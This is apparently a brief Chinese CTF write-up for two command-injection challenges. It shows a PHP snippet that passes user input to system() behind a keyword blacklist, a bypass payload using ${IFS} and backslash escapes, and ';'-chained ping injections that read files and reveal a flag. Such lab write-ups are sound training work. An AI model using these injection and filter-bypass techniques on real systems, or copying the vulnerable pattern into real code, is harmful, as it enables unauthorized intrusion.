CTF_2021babyRCE_0">[MoeCTF 2021]babyRCE
考点:关键词过滤(绕过方法参考往期博客)
来源:nssctf
<?php$rce = $_GET['rce'];
if (isset($rce)) {if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {system($rce);}else {echo "hhhhhhacker!!!"."\n";}
} else {highlight_file(__FILE__);
}
先用ls查看
空格可以用${IFS}绕过
构造payload:?rce=ca\t${IFS}fl\ag.php
command_execution
考点:命令执行
来源:攻防世界
先ping一下127.0.0.1
再用;来连接两个命令 127.0.0.1;ls
试试看能不能查看inddex.php
127.0.0.1;cat index.php
很明显,不行,那就退级看看
在home中发现flag。
查看flag
127.0.0.1;cat …/…/…/home/flag.txt
cyberpeace{ac541782e73fa1da4a98ec4bc3449fb1}
